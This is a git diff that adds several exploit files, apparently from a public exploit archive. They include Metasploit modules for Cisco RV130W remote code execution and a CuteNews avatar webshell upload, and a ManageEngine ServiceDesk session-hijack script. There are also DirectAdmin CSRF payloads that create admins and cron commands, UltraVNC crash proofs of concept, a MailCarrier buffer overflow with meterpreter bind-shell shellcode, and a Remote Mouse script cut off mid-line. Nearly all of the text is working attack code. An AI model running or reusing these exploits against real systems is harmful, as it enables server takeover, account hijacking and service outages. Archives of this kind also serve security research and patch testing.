diff --git a/exploits/hardware/remote/46705.rb b/exploits/hardware/remote/46705.rb new file mode 100755 index 000000000..273813c18 --- /dev/null +++ b/exploits/hardware/remote/46705.rb @@ -0,0 +1,149 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +# linux/armle/meterpreter/bind_tcp -> segfault +# linux/armle/meterpreter/reverse_tcp -> segfault +# linux/armle/meterpreter_reverse_http -> works +# linux/armle/meterpreter_reverse_https -> works +# linux/armle/meterpreter_reverse_tcp -> works +# linux/armle/shell/bind_tcp -> segfault +# linux/armle/shell/reverse_tcp -> segfault +# linux/armle/shell_bind_tcp -> segfault +# linux/armle/shell_reverse_tcp -> segfault +# +class MetasploitModule < Msf::Exploit::Remote + Rank = GoodRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Cisco RV130W Routers Management Interface Remote Command Execution', + 'Description' => %q{ + A vulnerability in the web-based management interface of the Cisco RV130W Wireless-N Multifunction VPN Router + could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device. + + The vulnerability is due to improper validation of user-supplied data in the web-based management interface. + An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device. + + A successful exploit could allow the attacker to execute arbitrary code on the underlying operating + system of the affected device as a high-privilege user. + + RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected. + + Note: successful exploitation may not result in a session, and as such, + on_new_session will never repair the HTTP server, leading to a denial-of-service condition. + }, + 'Author' => + [ + 'Yu Zhang', # Initial discovery + 'Haoliang Lu', # Initial discovery + 'T. Shiomitsu', # Initial discovery + 'Quentin Kaiser ' # Vulnerability analysis & exploit dev + ], + 'License' => MSF_LICENSE, + 'Platform' => %w[linux], + 'Arch' => [ARCH_ARMLE], + 'SessionTypes' => %w[meterpreter], + 'CmdStagerFlavor' => %w{ wget }, + 'Privileged' => true, # BusyBox + 'References' => + [ + ['CVE', '2019-1663'], + ['BID', '107185'], + ['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-rmi-cmd-ex'], + ], + 'DefaultOptions' => { + 'WfsDelay' => 10, + 'SSL' => true, + 'RPORT' => 443, + 'CMDSTAGER::FLAVOR' => 'wget', + 'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp', + }, + 'Targets' => + [ + [ 'Cisco RV130/RV130W < 1.0.3.45', + { + 'offset' => 446, + 'libc_base_addr' => 0x357fb000, + 'system_offset' => 0x0004d144, + 'gadget1' => 0x00020e79, # pop {r2, r6, pc}; + 'gadget2' => 0x00041308, # mov r0, sp; blx r2; + 'Arch' => ARCH_ARMLE, + } + ], + ], + 'DisclosureDate' => 'Feb 27 2019', + 'DefaultTarget' => 0, + 'Notes' => { + 'Stability' => [ CRASH_SERVICE_DOWN, ], + }, + )) + end + + def p(offset) + [(target['libc_base_addr'] + offset).to_s(16)].pack('H*').reverse + end + + def prepare_shellcode(cmd) + #All these gadgets are from /lib/libc.so.0 + shellcode = rand_text_alpha(target['offset']) + # filler + p(target['gadget1']) + + p(target['system_offset']) + # r2 + rand_text_alpha(4) + # r6 + p(target['gadget2']) + # pc + cmd + shellcode + end + + def send_request(buffer) + begin + send_request_cgi({ + 'uri' => '/login.cgi', + 'method' => 'POST', + 'vars_post' => { + "submit_button": "login", + "submit_type": "", + "gui_action": "", + "wait_time": 0, + "change_action": "", + "enc": 1, + "user": rand_text_alpha_lower(5), + "pwd": buffer, + "sel_lang": "EN" + } + }) + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the router") + end + end + + def exploit + print_status('Sending request') + execute_cmdstager + end + + def execute_command(cmd, opts = {}) + shellcode = prepare_shellcode(cmd.to_s) + send_request(shellcode) + end + + def on_new_session(session) + # Given there is no process continuation here, the httpd server will stop + # functioning properly and we need to take care of proper restart + # ourselves. + print_status("Reloading httpd service") + reload_httpd_service = "killall httpd && cd /www && httpd && httpd -S" + if session.type.to_s.eql? 'meterpreter' + session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi' + session.sys.process.execute '/bin/sh', "-c \"#{reload_httpd_service}\"" + else + session.shell_command(reload_httpd_service) + end + ensure + super + end +end \ No newline at end of file diff --git a/exploits/jsp/webapps/46659.py b/exploits/jsp/webapps/46659.py new file mode 100755 index 000000000..afbc13cad --- /dev/null +++ b/exploits/jsp/webapps/46659.py @@ -0,0 +1,193 @@ +#!/usr/bin/python + +# Exploit Title: Manage Engine ServiceDesk Plus Version <10.0 Privilege Escalation +# Date: 30-03-2019 +# Exploit Author: Ata Hakçıl, Melih Kaan Yıldız +# Vendor: ManageEngine +# Vendor Homepage: www.manageengine.com +# Product: Service Desk Plus +# Version: 10.0 +# Tested On: Kali Linux +# CVE: CVE-2019-10008 +# Platform: JSP + +# Timeline + +# 22 march 2019: Discovery +# 24 march 2019: CVE id reserved for CVE-2019-10008 +# 26 march 2019: First contact with vendor +# 5 april 2019: First publication +# 10 april 2019: Vendor confirmation +# 11 april 2019: Vendor released a fix (version 10017) + + +# Reference link: https://www.manageengine.com/products/service-desk/readme.html + +import os +import re + + + +# How to use: Change the host, low_username, low_password and high_username variables depending on what you have. +# Low username and password is an account you have access to. high_username is account you want to authenticate as. + +# After running the script, it will output you the cookies that you can set on your browser to login to the high_username without password. + + +#Host ip address + port +host="localhost:8080" + +#set to https if needed +url = "http://" + host + +#Username with credentials you have +low_username="guest" +low_password="guest" + +#username you want to login as +high_username="administrator" + +print("\033[1;37mUrl: \033[1;32m" + url) +print("\033[1;37mUser with low priv: \033[1;32m" + low_username + ':' + low_password) +print("\033[1;37mUser to bypass authentication to: \033[1;32m" + high_username) + + +print("\033[1;32mGetting a session id\033[1;37m") + +# Get index page to capture a session id +curl = "curl -i -s -k -X $'GET' \ + -H $'Host: "+host+"' -H $'Referer: "+url+"/' -H $'Connection: close'\ + $'"+url+"/'" + +out = os.popen('/bin/bash -c "' + curl+'"').read() +sessid = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0] + +print("Sessid:") +print(sessid) + + +print("\033[1;31mLogging in with low privilege user\033[1;37m") + + +#Attempt login post request +curl="curl -i -s -k -X $'POST' -H $'Host: "+host+"'\ + -H $'Referer: "+url+"/'\ + -H $'Connection: close' -H $'Cookie: JSESSIONID="+sessid+"' \ + -b $'JSESSIONID="+sessid+"' \ + --data-binary $'j_username="+low_username+"&j_password="+low_password+"&LDAPEnable=false&\ + hidden=Select+a+Domain&hidden=For+Domain&AdEnable=false&DomainCount=0&LocalAuth=No&LocalAuthWithDomain=No&\ + dynamicUserAddition_status=true&localAuthEnable=true&logonDomainName=-1&loginButton=Login&checkbox=checkbox' \ + $'"+url+"/j_security_check'" + +out = os.popen('/bin/bash -c "' + curl+'"').read() + + +#Instead of following redirects with -L, following manually because we don't need all the transactions. +curl="curl -i -s -k -X $'GET' -H $'Host: "+host+"'\ + -H $'Referer: "+url+"/'\ + -H $'Connection: close' -H $'Cookie: JSESSIONID="+sessid+"' \ + -b $'JSESSIONID="+sessid+"' \ + $'"+url+"/'" + +out = os.popen('/bin/bash -c "' + curl+'"').read() + +print("\033[1;32mCaptured authenticated cookies.\033[1;37m") +sessid = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0] +print(sessid) +sessidsso = re.findall("(?<=Set-Cookie: JSESSIONIDSSO=)[^;]*",out)[0] +print(sessidsso) +grbl = re.findall("(?<=Set-Cookie: )[^=]*=[^;]*",out) + +grbl2 = [] +for cookie in grbl: + cl = cookie.split('=') + if cl[0]!='JSESSIONID' and cl[0]!='JSESSIONIDSSO' and cl[0]!='_rem': + + grbl2.append(cl[0]) + grbl2.append(cl[1]) + +curl = "curl -i -s -k -X $'GET' \ + -H $'Host: "+host+"' \ + -H $'Cookie: JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ + -b $'JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ + $'"+url+"/mc/'" + + +out = os.popen('/bin/bash -c "' + curl+'"').read() +sessid2 = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0] + +print("\033[1;32mCaptured secondary sessid.\033[1;37m") +print(sessid2) + + +print("\033[1;31mDoing the magic step 1.\033[1;37m") +curl = "curl -i -s -k -X $'GET' \ + -H $'Host: "+host+"' \ + -H $'Referer: "+url+"/mc/WOListView.do' \ + -H $'Cookie: JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ + -b $'JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ + $'"+url+"/mc/jsp/MCLogOut.jsp'" + +out = os.popen('/bin/bash -c "' + curl+'"').read() + +print("\033[1;31mDoing the magic step 2.\033[1;37m") + + + + +curl = "curl -i -s -k -X $'GET' \ + -H $'Host: "+host+"' \ + -H $'Cookie: JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ + -b $'JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ + $'"+url+"/mc/jsp/MCDashboard.jsp'" + + +out = os.popen('/bin/bash -c "' + curl+'"').read() + +sessid3 = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0] +sessidsso = re.findall("(?<=Set-Cookie: JSESSIONIDSSO=)[^;]*",out)[0] + + +curl = "curl -i -s -k -X $'GET' \ + -H $'Host: "+host+"' \ + -H $'Cookie: JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ + -b $'JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ + $'"+url+"/'" + +out = os.popen('/bin/bash -c "' + curl+'"').read() +sessid4 = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0] + + +curl = "curl -i -s -k -X $'POST' \ + -H $'"+host+"' \ + -H $'Referer: "+url+"/mc/jsp/MCDashboard.jsp' \ + -H $'Cookie: JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ + -b $'JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ + --data-binary $'j_username="+high_username+"&j_password=bypassingpass&DOMAIN_NAME=' \ + $'"+url+"/mc/j_security_check'" + + +out = os.popen('/bin/bash -c "' + curl+'"').read() + +curl = "curl -i -s -k -X $'GET' \ + -H $'Host: "+host+"' \ + -H $'Referer: "+url+"/mc/jsp/MCDashboard.jsp' \ + -H $'Cookie: JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ + -H $'Upgrade-Insecure-Requests: 1' \ + -b $'JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ + $'"+url+"/mc/jsp/MCDashboard.jsp'" + + + +out = os.popen('/bin/bash -c "' + curl+'"').read() + + +sessidhigh = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0] +sessidssohigh = re.findall("(?<=Set-Cookie: JSESSIONIDSSO=)[^;]*",out)[0] + +print("\033[1;31mCaptured target session.Set following cookies on your browser.\033[1;37m") +print("JSESSIONID=" + sessidhigh) +print("JSESSIONIDSSO=" + sessidssohigh) +print(grbl2[0] + "=" + grbl2[1]) +print(grbl2[2] + "=" + grbl2[3]) +print("_rem=true") \ No newline at end of file diff --git a/exploits/php/remote/46698.rb b/exploits/php/remote/46698.rb new file mode 100755 index 000000000..2471ac3ec --- /dev/null +++ b/exploits/php/remote/46698.rb @@ -0,0 +1,181 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => "CuteNews 2.1.2 - 'avatar' Remote Code Execution", + 'Description' => %q( + This module exploits a command execution vulnerability in CuteNews prior to 2.1.2. + The attacker can infiltrate the server through the avatar upload process in the profile area. + There is no realistic control of the $imgsize function in "/core/modules/dashboard.php" + Header content of the file can be changed and the control can be bypassed. + We can use the "GIF" header for this process. + An ordinary user is enough to exploit the vulnerability. No need for admin user. + The module creates a file for you and allows RCE. + ), + 'License' => MSF_LICENSE, + 'Author' => + [ + 'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module + ], + 'References' => + [ + ['URL', 'http://pentest.com.tr/exploits/CuteNews-2-1-2-Remote-Code-Execution-Metasploit.html'] + ['URL', 'http://cutephp.com'] # Official Website + ], + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Targets' => [['Automatic', {}]], + 'Privileged' => false, + 'DisclosureDate' => "Apr 14 2019", + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [true, "Base CutePHP directory path", '/CuteNews']), + OptString.new('USERNAME', [true, "Username to authenticate with", 'admin']), + OptString.new('PASSWORD', [false, "Password to authenticate with", 'admin']) + ] + ) + end + + def exec + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "uploads","avatar_#{datastore['USERNAME']}_#{@shell}") # shell url + }) + end +## +# Login and cookie information gathering +## + + def login(uname, pass, check) + # 1st request to get cookie + res = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'index.php'), + 'vars_post' => { + 'action' => 'dologin', + 'username' => uname, + 'password' => pass + } + ) + + cookie = res.get_cookies + # 2nd request to cookie validation + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "index.php"), + 'cookie' => cookie + }) + + if res.code = 200 && (res.body =~ /dashboard/) + return cookie + end + + fail_with(Failure::NoAccess, "Authentication was unsuccessful with user: #{uname}") + return nil + end + + def peer + "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}" + end +## +# Upload malicious file // payload integration +## + def upload_shell(cookie, check) + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "index.php?mod=main&opt=personal"), + 'cookie' => cookie + }) + + signkey = res.body.split('__signature_key" value="')[1].split('"')[0] + signdsi = res.body.split('__signature_dsi" value="')[1].split('"')[0] + # data preparation + fname = Rex::Text.rand_text_alpha_lower(8) + ".php" + @shell = "#{fname}" + pdata = Rex::MIME::Message.new + pdata.add_part('main', nil, nil, 'form-data; name="mod"') + pdata.add_part('personal', nil, nil, 'form-data; name="opt"') + pdata.add_part("#{signkey}", nil, nil, 'form-data; name="__signature_key"') + pdata.add_part("#{signdsi}", nil, nil, 'form-data; name="__signature_dsi"') + pdata.add_part('', nil, nil, 'form-data; name="editpassword"') + pdata.add_part('', nil, nil, 'form-data; name="confirmpassword"') + pdata.add_part("#{datastore['USERNAME']}", nil, nil, 'form-data; name="editnickname"') + pdata.add_part("GIF\r\n" + payload.encoded, 'image/png', nil, "form-data; name=\"avatar_file\"; filename=\"#{fname}\"") + pdata.add_part('', nil, nil, 'form-data; name="more[site]"') + pdata.add_part('', nil, nil, 'form-data; name="more[about]"') + data = pdata.to_s + + res = send_request_cgi({ + 'method' => 'POST', + 'data' => data, + 'agent' => 'Mozilla', + 'ctype' => "multipart/form-data; boundary=#{pdata.bound}", + 'cookie' => cookie, + 'uri' => normalize_uri(target_uri.path, "index.php") + }) + + if res && res.code == 200 && res.body =~ /User info updated!/ + print_status("Trying to upload #{fname}") + return true + else + fail_with(Failure::NoAccess, 'Error occurred during uploading!') + return false + end + + end +## +# Exploit controls and information +## + def exploit + unless Exploit::CheckCode::Vulnerable == check + fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') + end + + cookie = login(datastore['USERNAME'], datastore['PASSWORD'], false) + print_good("Authentication was successful with user: #{datastore['USERNAME']}") + + if upload_shell(cookie, true) + print_good("Upload successfully.") + exec + end + end +## +# Version and Vulnerability Check +## + def check + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "index.php") + }) + + unless res + vprint_error 'Connection failed' + return CheckCode::Unknown + end + + if res.code == 200 + version = res.body.split('target="_blank">CuteNews ')[1].split('')[0] + if version < '2.1.3' + print_status("#{peer} - CuteNews is #{version}") + return Exploit::CheckCode::Vulnerable + end + end + + return Exploit::CheckCode::Safe + end +end +## +# The end of the adventure (o_O) // AkkuS +## \ No newline at end of file diff --git a/exploits/php/webapps/46694.txt b/exploits/php/webapps/46694.txt new file mode 100644 index 000000000..1beebdb07 --- /dev/null +++ b/exploits/php/webapps/46694.txt @@ -0,0 +1,69 @@ +# Title: DirectAdmin Multiple Vulnerabilities to Takeover the Server <= v1.561 +# Date: 12.04.2019 +# Author: InfinitumIT +# Vendor Homepage: https://www.directadmin.com/ +# Version: Up to v1.561. +# CVE: CVE-2019-11193 +# info@infinitumit.com.tr && infinitumit.com.tr + +# Description: +# Multiple security vulnerabilities has been discovered in popular server control panel DirectAdmin, by +# InfinitumIT. Attackers can combine those security vulnerabilities and do a lot of critical action like server control takeover. +# Those vulnerabilities (Cross Site Scripting and Cross Site Request Forgery) may cause them to happen: +# Add administrator, execute command remote (RCE), Full Backup the Server and Upload the Own Server, webshell upload and more. + +# Reflected XSS Vulnerabilities: +# https://SERVERIP:2222/CMD_FILE_MANAGER/XSS-PAYLOAD +# https://SERVERIP:2222/CMD_SHOW_USER?user=XSS-PAYLOAD +# https://SERVERIP:2222/CMD_SHOW_RESELLER?user=XSS-PAYLOAD + +# Example Payloads: +# Add Administrator: +var url = "http://SERVERIP:2222/CMD_ACCOUNT_ADMIN"; +var params = +"fakeusernameremembered=&fakepasswordremembered=&action=create&username=username&emai +l=test%40test.com&passwd=password&passwd2=password¬ify=ye"; +var vuln = new XMLHttpRequest(); +vuln.open("POST", url, true); +vuln.withCredentials = 'true'; +vuln.setRequestHeader("Content-type", +"application/x-www-form-urlencoded"); +vuln.send(params); + +# Remote Command Execution by Cron Jobs: +var url = "http://SERVERIP:2222/CMD_CRON_JOBS"; +var params = +"action=create&minute=*&hour=*&dayofmonth=*&month=*&dayofweek=*&command=command"; +var vuln = new XMLHttpRequest(); +vuln.open("POST", url, true); +vuln.withCredentials = 'true'; +vuln.setRequestHeader("Content-type", +"application/x-www-form-urlencoded"); +vuln.send(params); + +# Edit File: +var url = "http://SERVERIP:2222/CMD_ADMIN_FILE_EDITOR"; +var params = "file=the-file-full-path&action=save&text=new-content"; +var vuln = new XMLHttpRequest(); +vuln.open("POST", url, true); +vuln.withCredentials = 'true'; +vuln.setRequestHeader("Content-type", +"application/x-www-form-urlencoded"); +vuln.send(params); + +# Create FTP Account: +var url = "http://SERVERIP:2222/CMD_FTP"; +var params = +"fakeusernameremembered=&fakepasswordremembered=&action=create&domain=infinitumit.com.tr +&user=username&passwd=password&random=Save+Password&passwd2=password&type=domain&cu +stom_val=%2Fhome%2Fusername&create=Create"; +var vuln = new XMLHttpRequest(); +vuln.open("POST", url, true); +vuln.withCredentials = 'true'; +vuln.setRequestHeader("Content-type", +"application/x-www-form-urlencoded"); +vuln.send(params); + + +# Vulnerabilities are fixed in minutes, thanks to DirectAdmin. +# InfinitumIT / For safer days... \ No newline at end of file diff --git a/exploits/windows/dos/46702.py b/exploits/windows/dos/46702.py new file mode 100755 index 000000000..e417e3d9b --- /dev/null +++ b/exploits/windows/dos/46702.py @@ -0,0 +1,21 @@ +#Exploit Title: UltraVNC Viewer 1.2.2.4 - Denial of Service (PoC) +#Discovery by: Victor Mondragón +#Discovery Date: 2019-04-14 +#Vendor Homepage: https://www.uvnc.com/ +#Software Link: https://www.uvnc.com/downloads/ultravnc/126-download-ultravnc-1224.html +#Tested Version: 1.2.2.4 +#Tested on: Windows 7 x64 Service Pack 1 + +#Steps to produce the crash: +#1.- Run python code: UltraVNC_Viewer_1.2.2.4.py +#2.- Open UltraViewer.txt and copy content to clipboard +#3.- Open UltraVNC Viewer +#4.- In "VNC Server" Paste Clipboard +#5.- Click on "Connect" +#6.- Crashed + +cod = "\x41" * 256 + +f = open('UltraViewer.txt', 'w') +f.write(cod) +f.close() \ No newline at end of file diff --git a/exploits/windows/dos/46703.py b/exploits/windows/dos/46703.py new file mode 100755 index 000000000..a63ec6e36 --- /dev/null +++ b/exploits/windows/dos/46703.py @@ -0,0 +1,22 @@ +#Exploit Title: UltraVNC Launcher 1.2.2.4 - Denial of Service (PoC) +#Discovery by: Victor Mondragón +#Discovery Date: 2019-04-14 +#Vendor Homepage: https://www.uvnc.com/ +#Software Link: https://www.uvnc.com/downloads/ultravnc/126-download-ultravnc-1224.html +#Tested Version: 1.2.2.4 +#Tested on: Windows 7 x64 Service Pack 1 + +#Steps to produce the crash: +#1.- Run python code: UltraVNC_Launcher_1.2.2.4.py +#2.- Open UltraLauncher.txt and copy content to clipboard +#3.- Open UltraVNC Launcher +#4.- Select "Properties" +#5.- In "Path vncviewer.exe" Paste Clipboard +#6.- Click on "OK" +#7.- Crashed + +cod = "\x41" * 300 + +f = open('UltraLauncher.txt', 'w') +f.write(cod) +f.close() \ No newline at end of file diff --git a/exploits/windows/remote/46695.py b/exploits/windows/remote/46695.py new file mode 100755 index 000000000..746bf286b --- /dev/null +++ b/exploits/windows/remote/46695.py @@ -0,0 +1,84 @@ +#!/usr/bin/python +# Exploit Title: MailCarrier 2.51 'RCPT TO' - Buffer Overflow (Remote) +# Date: 12/04/2019 +# Exploit Author: Dino Covotsos - Telspace Systems +# Vendor Homepage: https://www.tabslab.com/ +# Version: 2.51 +# Software Link: N.A +# Contact: services[@]telspace.co.za +# Twitter: @telspacesystems (Greets to the Telspace Crew) +# Tested on: Windows XP Prof SP3 ENG x86 +# CVE: TBC from Mitre +# Created for the Telspace Internship 2019 - Vanilla EIP Overwrite +#0x7e4456f7 : jmp esp | {PAGE_EXECUTE_READ} [USER32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\USER32.dll) +#POC +#1.) Change ip and port in code +#2.) Run script against target, meterpreter bind shell waiting for you on port 443 on the target machine +import sys +import socket +import time + +#msfvenom -a x86 --platform windows -p windows/meterpreter/bind_tcp LPORT=443 -e x86/alpha_mixed -b "\x00\xd5\x0a\x0d\x1a\x03" -f c +shellcode = ("\x89\xe0\xda\xdf\xd9\x70\xf4\x5d\x55\x59\x49\x49\x49\x49\x49" +"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a" +"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32" +"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" +"\x79\x6c\x6a\x48\x4d\x52\x57\x70\x45\x50\x65\x50\x55\x30\x6e" +"\x69\x6a\x45\x55\x61\x39\x50\x32\x44\x4e\x6b\x76\x30\x44\x70" +"\x4e\x6b\x42\x72\x76\x6c\x6c\x4b\x51\x42\x47\x64\x6e\x6b\x44" +"\x32\x44\x68\x56\x6f\x4c\x77\x43\x7a\x57\x56\x34\x71\x6b\x4f" +"\x6c\x6c\x37\x4c\x73\x51\x61\x6c\x75\x52\x74\x6c\x35\x70\x49" +"\x51\x68\x4f\x76\x6d\x56\x61\x6a\x67\x4a\x42\x7a\x52\x62\x72" +"\x53\x67\x4c\x4b\x72\x72\x54\x50\x4c\x4b\x63\x7a\x75\x6c\x4e" +"\x6b\x70\x4c\x72\x31\x73\x48\x4b\x53\x31\x58\x63\x31\x68\x51" +"\x43\x61\x6e\x6b\x72\x79\x77\x50\x46\x61\x5a\x73\x6e\x6b\x32" +"\x69\x64\x58\x6d\x33\x35\x6a\x32\x69\x4e\x6b\x67\x44\x4c\x4b" +"\x75\x51\x39\x46\x30\x31\x69\x6f\x4c\x6c\x4f\x31\x6a\x6f\x64" +"\x4d\x36\x61\x79\x57\x74\x78\x4d\x30\x32\x55\x7a\x56\x75\x53" +"\x73\x4d\x48\x78\x67\x4b\x61\x6d\x64\x64\x74\x35\x6b\x54\x72" +"\x78\x6e\x6b\x71\x48\x54\x64\x33\x31\x38\x53\x72\x46\x4c\x4b" +"\x44\x4c\x50\x4b\x6e\x6b\x71\x48\x55\x4c\x65\x51\x48\x53\x4e" +"\x6b\x54\x44\x4e\x6b\x76\x61\x5a\x70\x6f\x79\x57\x34\x76\x44" +"\x46\x44\x61\x4b\x31\x4b\x63\x51\x50\x59\x50\x5a\x32\x71\x79" +"\x6f\x59\x70\x51\x4f\x71\x4f\x70\x5a\x6e\x6b\x34\x52\x68\x6b" +"\x6c\x4d\x33\x6d\x53\x58\x74\x73\x44\x72\x67\x70\x53\x30\x52" +"\x48\x52\x57\x53\x43\x36\x52\x53\x6f\x61\x44\x50\x68\x72\x6c" +"\x31\x67\x55\x76\x64\x47\x6b\x4f\x78\x55\x68\x38\x6c\x50\x67" +"\x71\x63\x30\x45\x50\x64\x69\x4f\x34\x62\x74\x50\x50\x72\x48" +"\x54\x69\x4f\x70\x42\x4b\x67\x70\x49\x6f\x6e\x35\x50\x6a\x46" +"\x6b\x56\x39\x62\x70\x78\x62\x79\x6d\x42\x4a\x53\x31\x61\x7a" +"\x56\x62\x43\x58\x49\x7a\x64\x4f\x69\x4f\x59\x70\x4b\x4f\x79" +"\x45\x4f\x67\x73\x58\x56\x62\x57\x70\x67\x71\x4f\x4b\x4b\x39" +"\x4b\x56\x50\x6a\x56\x70\x66\x36\x63\x67\x62\x48\x4a\x62\x6b" +"\x6b\x67\x47\x55\x37\x6b\x4f\x5a\x75\x6f\x75\x49\x50\x33\x45" +"\x53\x68\x53\x67\x31\x78\x6f\x47\x6b\x59\x70\x38\x49\x6f\x59" +"\x6f\x38\x55\x66\x37\x33\x58\x61\x64\x68\x6c\x65\x6b\x38\x61" +"\x79\x6f\x4b\x65\x66\x37\x4e\x77\x52\x48\x73\x45\x62\x4e\x62" +"\x6d\x65\x31\x79\x6f\x7a\x75\x70\x6a\x55\x50\x73\x5a\x36\x64" +"\x71\x46\x56\x37\x72\x48\x56\x62\x38\x59\x4b\x78\x61\x4f\x69" +"\x6f\x69\x45\x4f\x73\x5a\x58\x63\x30\x51\x6e\x66\x4d\x4e\x6b" +"\x74\x76\x72\x4a\x47\x30\x51\x78\x57\x70\x76\x70\x63\x30\x65" +"\x50\x33\x66\x50\x6a\x37\x70\x30\x68\x31\x48\x49\x34\x51\x43" +"\x5a\x45\x49\x6f\x59\x45\x4e\x73\x76\x33\x70\x6a\x33\x30\x76" +"\x36\x52\x73\x53\x67\x52\x48\x66\x62\x6e\x39\x58\x48\x33\x6f" +"\x69\x6f\x4a\x75\x4d\x53\x7a\x58\x43\x30\x73\x4e\x73\x37\x47" +"\x71\x58\x43\x77\x59\x49\x56\x52\x55\x6d\x39\x5a\x63\x4f\x4b" +"\x68\x70\x6e\x55\x6e\x42\x63\x66\x33\x5a\x33\x30\x50\x53\x69" +"\x6f\x58\x55\x41\x41") + +buffer = "A" * 5090 + "\xf7\x56\x44\x7e" + "\x90" * 20 + shellcode + "B" * 100 + +print "[*] Sending pwnage buffer: with %s bytes" %len(buffer) +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +connect=s.connect(("192.168.0.150", 25)) +print s.recv(1024) +s.send('EHLO root@telspace.co.za \r\n') +print s.recv(1024) +s.send('MAIL FROM: pwnz@telspace.co.za \r\n') +print s.recv(1024) +s.send('RCPT TO: '+ buffer + '\r\n') +print s.recv(1024) +s.send('QUIT\r\n') +s.close() +time.sleep(1) +print "[*] Done, but if you get here the exploit failed!" \ No newline at end of file diff --git a/exploits/windows/remote/46697.py b/exploits/windows/remote/46697.py new file mode 100755 index 000000000..711dba73e --- /dev/null +++ b/exploits/windows/remote/46697.py @@ -0,0 +1,136 @@ +""" +# Exploit Title: Remote Mouse 3.008 Failure to Authenticate +# Date: 4/9/2019 +# Exploit Author: 0rphon +# Software Link: https://www.remotemouse.net/ +# Version: 3.008 +# Tested on: Windows 10 + +Remote Mouse 3.008 fails to check for authenication and will execute any command any machine gives it +This script pops calc as proof of concept (albeit a bit slowly) +It also has an index of the keycodes the app uses to communicate with the computer if you want to mess around with it yourself +""" + +#!/usr/bin/python2 +from socket import socket, AF_INET, SOCK_STREAM, SOCK_DGRAM +from time import sleep +from sys import argv + +def Ping(ip): + try: + target = socket(AF_INET, SOCK_STREAM) + target.settimeout(5) + target.connect((ip, 1978)) + response=target.recv(1048) + target.close() + if response=="SIN 15win nop nop 300": + return True + else: return False + except: + print("ERROR: Request timed out") + + + +def 